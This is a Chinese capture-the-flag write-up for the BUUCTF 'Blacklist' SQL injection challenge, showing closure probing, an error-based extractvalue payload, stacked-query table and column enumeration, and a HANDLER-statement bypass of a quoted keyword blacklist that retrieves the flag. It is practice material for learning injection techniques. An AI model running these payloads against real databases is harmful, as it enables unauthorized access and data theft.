这是一道sql注入题目,我们先来尝试对它进行闭合,payload:1'

使用联合查询,构造payload:

?inject=1' union select 1,2--+

过滤了许多东西:

/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i

其中的select被过滤掉了

尝试使用报错注入进行突破:

?inject=1' and extractvalue(1,concat(0x7e,(database()),0x7e))--+

得到数据库:supersqli

由于过滤掉了insert和delete,我们无法使用报错注入,尝试使用堆叠注入进行突破

?inject=-1';use supersqli;show tables--+

发现了两个表,猜测flag在flaghere里面,接下来查字段

?inject=-1';use supersqli;show columns from FlagHere--+

看到了字段flag

用handle读取

这里的handle语句和select查询语句都可以在mysql中查询想要的东西

基本语句是

通过HANDLER tbl_name OPEN打开一张表,无返回结果。

通过HANDLER tbl_name READ FIRST获取tbl_name的第一行,通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。
通过HANDLER tbl_name CLOSE来关闭打开的tbl_name。

?inject=1';handler FlagHere open;handler FlagHere read first--+

flag{0e61116e-dd99-49ec-ba01-5537cec1a996}

buuctf blacklist相关推荐

  1. BUUCTF [GYCTF2020] Blacklist

    BUUCTF [GYCTF2020] Blacklist 启动靶机: 提交参数1后正常回显内容: 输入2/2判断注入类型: 回显为2,可以判断出为字符型注入 输入select,查看是否存在回显: re ...

  2. BUUCTF[GYCTF2020]Blacklist

    sql注入题型,测试发现黑名单如下: 大小写,双写,编码均不可绕过. 可用的还有,or and union show 输入:1 or 1=1 无反应 输入:1' or '1' ='1 如下: 字符型注 ...

  3. Buuctf -web wp汇总(一)

    Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 持续更新ing~ BuuCTF平台 文章目录 BuuCTF平台 [极客大挑战 2019]EasySQL [极 ...

  4. [GYCTF2020]Blacklist 使用handler函数进行sql堆注入

    [GYCTF2020]Blacklist 前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 参 ...

  5. BUUCTF Web 第二页全部Write ups

    更多笔记,可以关注yym68686.top 目录 [强网杯 2019]高明的黑客 [BUUCTF 2018]Online Tool [RoarCTF 2019]Easy Java [GXYCTF201 ...

  6. BUUCTF的Web真题学习整理(一)

    目录 WEB1-WarmUp (任意文件包含漏洞) WEB2-高明的黑客(fuzz脚本) WEB3-easy_tornado (服务端模板注入(ssti攻击)) WEB4-Hack World(时间盲 ...

  7. BUUCTF寒假刷题-Web

    前言 寒假横向刷题(尽量) BUUCTF

  8. 710. Random Pick with Blacklist - LeetCode

    为什么80%的码农都做不了架构师?>>>    Question 710. Random Pick with Blacklist Solution 题目大意:给一个N,表示一个范围[ ...

  9. BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过

    BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过 题目 后台PHP源码: <?php include 'config.php'; // FLA ...

最新文章

  1. 不需要显示地图 就获得用户当前经纬度 超简单的方法
  2. JVM面试问题系列:JVM 配置常用参数和常用 GC 调优策略
  3. 页面缓存导致数据错误
  4. window7下nginx配置文件详解
  5. Supervised Convolutional Neural Network
  6. 选择排序、冒泡排序、异或运算
  7. Spring Boot基础学习笔记08:Spring Boot整合Redis
  8. 在Jenkins远程链接Linux系统,然后执行shell命令-亲测可用【转】
  9. CocoStudio基础教程(6)使用CocoStudio编辑帧事件并关联到程序
  10. python贴吧评论没有权限怎么回事_女朋友总是问我谁好看,只好用python整个评分来回答灵魂拷问!出事就让百度背锅吧!...
  11. python好用的内置库_python内置的高效好用各种库
  12. 计算机主机有gpib接口吗,PC104模块与通用并行接口(GPIB)通讯的实现
  13. 电视机顶盒搜台原理和方法简析
  14. ElasticSearch学习总结2(基础查询)
  15. 2019年数学建模美赛经验总结
  16. html如何根据颜色排序,Excel技巧:按颜色排序或筛选
  17. 小白程序员应避免的错误
  18. BZOJ4872 [SHOI2017]分手是祝愿
  19. 想通过手机刷视频赚钱?这篇文章你有必要了解一下
  20. 耳机重装系统后服务器坏了,Win7重装后耳机没声音|重装系统后耳机没声音怎么办?...

热门文章

  1. 解决java.lang.IllegalArgumentException:Property ‘sqlSessionFactory‘ or ‘sqlSessionTemplate‘ are requir
  2. 1875 丢手绢 约瑟夫环变形 枚举
  3. Redis学习笔记(附面试题)
  4. 【Chips】如何启动第一个Quartus/Vivado下的Verilog仿真过程
  5. 【unity shader】基于UGUI字体的outline优化
  6. 为何多语临床试验需要专业的翻译公司?
  7. 优酷youku 1080P 视频下载方法
  8. Python神笔马良案例集简介
  9. 若依框架引入外部字体(思源黑体)
  10. android 進度條_Android ProgressBar 反向進度條/進度條從右到左走